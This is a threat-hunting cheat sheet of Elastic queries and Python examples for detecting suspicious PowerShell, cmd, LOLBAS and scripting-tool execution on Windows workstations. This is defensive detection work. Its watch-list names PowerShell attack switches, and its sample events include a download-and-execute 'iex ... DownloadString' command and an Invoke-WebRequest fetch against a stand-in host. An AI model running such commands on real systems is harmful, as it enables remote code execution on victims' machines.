Execution
Use of command-line tools (powershell, cmd, etc)
Search using the winlog "Process Creation" event ID (1), coupled with the process names of the targeted CLI tools:

host.name:WKSTN-* AND winlog.event_id:"1" AND process.name:(cmd.exe or powershell.exe)

Alternatively, use the winlog "PowerShell Script Block" event ID:

host.name: WKSTN-* AND winlog.event_id: 4104

Then get rid of the noise by eliminating anything that starts with Set-StrictMode.

Strings that should be closely monitored include:
invoke / invoke-expression / iex
-enc / -encoded
-noprofile / -nop
bypass
-c / -command
-executionpolicy / -ep
WebRequest
Download
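As an added example (not part of the original cheat sheet), the two searches above and the string watch-list, run in Python over a handful of constructed events. Field names follow the flattened ECS/winlogbeat layout the queries use; the script block field `powershell.file.script_block_text` and the sample command lines are assumptions made up for the example, not real telemetry.

```python
import fnmatch
import re

# Constructed sample events (not real telemetry), flattened ECS/winlogbeat field names.
# Event ID 1 = Sysmon process creation, 4104 = PowerShell script block logging.
EVENTS = [
    {"host.name": "WKSTN-042", "winlog.event_id": 1, "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {"host.name": "WKSTN-042", "winlog.event_id": 1, "process.name": "cmd.exe",
     "process.command_line": "cmd.exe /c dir"},
    {"host.name": "SRV-DB01", "winlog.event_id": 1, "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -ep bypass -File backup.ps1"},
    {"host.name": "WKSTN-101", "winlog.event_id": 1, "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -ep bypass -c iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"host.name": "WKSTN-101", "winlog.event_id": 1, "process.name": "notepad.exe",
     "process.command_line": "notepad.exe notes.txt"},
    {"host.name": "WKSTN-007", "winlog.event_id": 4104,
     "powershell.file.script_block_text": "Set-StrictMode -Version 1.0; $_.Name"},
    {"host.name": "WKSTN-007", "winlog.event_id": 4104,
     "powershell.file.script_block_text": "Invoke-WebRequest -Uri http://example.invalid/x -OutFile a.ps1"},
]

# The watch-list from the cheat sheet. Switch-style strings are anchored to a token
# boundary so "-c" does not fire on every "-command"-free word containing "c".
INDICATORS = [
    ("invoke", re.compile(r"\binvoke\b|\biex\b", re.I)),
    ("-enc", re.compile(r"(?<!\S)-enc\w*", re.I)),
    ("-noprofile", re.compile(r"(?<!\S)-nop\w*", re.I)),
    ("bypass", re.compile(r"\bbypass\b", re.I)),
    ("-command", re.compile(r"(?<!\S)-c(?:ommand)?(?!\S)", re.I)),
    ("-executionpolicy", re.compile(r"(?<!\S)-e(?:p|xecutionpolicy)(?!\S)", re.I)),
    ("WebRequest", re.compile(r"webrequest", re.I)),
    ("Download", re.compile(r"download", re.I)),
]


def matches_host(ev, host_pattern="WKSTN-*"):
    """Equivalent of host.name:WKSTN-* (wildcard match on the host name)."""
    return fnmatch.fnmatchcase(ev.get("host.name", ""), host_pattern)


def cli_tool_events(events, names=("cmd.exe", "powershell.exe")):
    """winlog.event_id:1 AND process.name:(cmd.exe or powershell.exe) on workstations."""
    return [ev for ev in events
            if matches_host(ev) and ev["winlog.event_id"] == 1
            and ev.get("process.name", "").lower() in names]


def script_block_events(events):
    """winlog.event_id:4104 on workstations, minus blocks starting with Set-StrictMode."""
    out = []
    for ev in events:
        if matches_host(ev) and ev["winlog.event_id"] == 4104:
            text = ev.get("powershell.file.script_block_text", "")
            if not text.lstrip().startswith("Set-StrictMode"):
                out.append(ev)
    return out


def suspicious_indicators(text):
    """Names of watch-list strings present in a command line or script block."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def _finding(ev, text):
    return {"host": ev["host.name"], "event_id": ev["winlog.event_id"],
            "text": text, "indicators": suspicious_indicators(text)}


def hunt(events):
    """Run both searches and annotate every hit with the watch-list strings it contains."""
    findings = [_finding(ev, ev.get("process.command_line", ""))
                for ev in cli_tool_events(events)]
    findings += [_finding(ev, ev.get("powershell.file.script_block_text", ""))
                 for ev in script_block_events(events)]
    return findings


def flagged(events):
    """Hits that contain at least one watch-list string (the ones worth a closer look)."""
    return [f for f in hunt(events) if f["indicators"]]


if __name__ == "__main__":
    for f in flagged(EVENTS):
        print(f["host"], f["event_id"], f["indicators"], "|", f["text"])
```

Plain cmd.exe /c dir still comes back from the first search but carries no indicators, which is the point of the watch-list: the query finds the tool, the strings rank what deserves attention. The Set-StrictMode filter is a prefix check, as the cheat sheet describes; if your environment's benign script blocks look different, extend that check rather than the watch-list.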
Use of living-off-the-land binaries/tools (LOLBAS)
Search using the winlog "Process Creation" and "Network Connection" event IDs (1 and 3 respectively), coupled with the process names and parent process names of the relevant LOLBAS binaries: mshta.exe, regsvr32.exe, certutil.exe, etc.

host.name:WKSTN-* and winlog.event_id:(1 or 3) and (process.parent.name:(mshta.exe or regsvr32.exe or certutil.exe) or process.name:(mshta.exe or regsvr32.exe or certutil.exe))

After that, following the PID of the processes spawned by those LOLBAS binaries can be relevant (using fields like process.pid or process.parent.pid).
Scripting and programming tools
Same concept as above, except this time we focus on things like Python/Node.js and other utilities that will be found in dev environments/workstations. You know the drill, winlog events 1 & 3:

host.name: WKSTN-* AND winlog.event_id: (1 OR 3) AND (process.name: (*python* OR *php* OR *nodejs*) OR process.parent.name: (*python* OR *php* OR *nodejs*))

As above, following the PID of the processes spawned by those tools can be relevant (using fields like process.pid or process.parent.pid).
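The LOLBAS search, the scripting-tool search and the "follow the PID" step they both end with, as one added Python example over constructed process creation and network connection events (example code, not from the cheat sheet). One matcher takes a list of name patterns, so the exact LOLBAS names and the *python* style wildcards are handled the same way; the two helpers after it walk process.parent.pid / process.pid up and down from a hit. Host names, PIDs and destination addresses are made up for the example.

```python
import fnmatch

# Constructed sample events (not real telemetry), flattened ECS/winlogbeat field names.
# Event ID 1 = process creation (has pid + parent pid), 3 = network connection.
EVENTS = [
    {"host.name": "WKSTN-042", "winlog.event_id": 1, "process.pid": 100, "process.name": "winword.exe",
     "process.parent.pid": 50, "process.parent.name": "explorer.exe"},
    {"host.name": "WKSTN-042", "winlog.event_id": 1, "process.pid": 200, "process.name": "mshta.exe",
     "process.parent.pid": 100, "process.parent.name": "winword.exe"},
    {"host.name": "WKSTN-042", "winlog.event_id": 3, "process.pid": 200, "process.name": "mshta.exe",
     "destination.ip": "203.0.113.5", "destination.port": 443},
    {"host.name": "WKSTN-042", "winlog.event_id": 1, "process.pid": 300, "process.name": "powershell.exe",
     "process.parent.pid": 200, "process.parent.name": "mshta.exe"},
    {"host.name": "SRV-DB01", "winlog.event_id": 1, "process.pid": 400, "process.name": "certutil.exe",
     "process.parent.pid": 310, "process.parent.name": "cmd.exe"},
    {"host.name": "WKSTN-DEV1", "winlog.event_id": 1, "process.pid": 500, "process.name": "python.exe",
     "process.parent.pid": 480, "process.parent.name": "code.exe"},
    {"host.name": "WKSTN-DEV1", "winlog.event_id": 3, "process.pid": 500, "process.name": "python.exe",
     "destination.ip": "198.51.100.7", "destination.port": 8080},
]

# Name lists from the two searches above; wildcards use the same glob syntax as the query.
LOLBAS = ["mshta.exe", "regsvr32.exe", "certutil.exe"]
DEV_TOOLS = ["*python*", "*php*", "*nodejs*"]


def _name_matches(name, patterns):
    return any(fnmatch.fnmatchcase(name.lower(), p.lower()) for p in patterns)


def process_hunt(events, patterns, event_ids=(1, 3), host_pattern="WKSTN-*"):
    """event_id:(1 or 3) AND (process.name OR process.parent.name matches one of patterns)."""
    return [ev for ev in events
            if fnmatch.fnmatchcase(ev.get("host.name", ""), host_pattern)
            and ev["winlog.event_id"] in event_ids
            and (_name_matches(ev.get("process.name", ""), patterns)
                 or _name_matches(ev.get("process.parent.name", ""), patterns))]


def ancestry(events, pid, host):
    """Walk process.parent.pid upwards from a creation event; returns names root-first.
    Restricted to one host because PIDs are only meaningful per machine."""
    creation = {ev["process.pid"]: ev for ev in events
                if ev["winlog.event_id"] == 1 and ev["host.name"] == host}
    chain, seen = [], set()
    while pid in creation and pid not in seen:
        seen.add(pid)                      # guard against PID reuse producing a loop
        ev = creation[pid]
        chain.append(ev["process.name"])
        parent = ev["process.parent.pid"]
        if parent not in creation:         # parent started before logging: keep its name
            chain.append(ev["process.parent.name"])
        pid = parent
    return list(reversed(chain))


def descendants(events, root_pid, host):
    """All PIDs spawned (directly or transitively) by root_pid on one host."""
    children = {}
    for ev in events:
        if ev["winlog.event_id"] == 1 and ev["host.name"] == host:
            children.setdefault(ev["process.parent.pid"], []).append(ev["process.pid"])
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        for child in children.get(pid, []):
            out.append(child)
            stack.append(child)
    return out


if __name__ == "__main__":
    for ev in process_hunt(EVENTS, LOLBAS):
        print("LOLBAS hit:", ev["host.name"], ev["winlog.event_id"], ev["process.name"], ev["process.pid"])
    print("chain:", " -> ".join(ancestry(EVENTS, 300, "WKSTN-042")))
    print("children of 100:", descendants(EVENTS, 100, "WKSTN-042"))
```

On the constructed data the LOLBAS search returns mshta.exe's creation and network events plus the powershell.exe it spawned, and the ancestry of that PowerShell reads explorer.exe -> winword.exe -> mshta.exe -> powershell.exe, which is the kind of chain the PID follow-up is meant to surface. Note that PIDs are reused over time, so pivoting on process.pid alone needs a time window or a host-unique process identifier if your pipeline carries one.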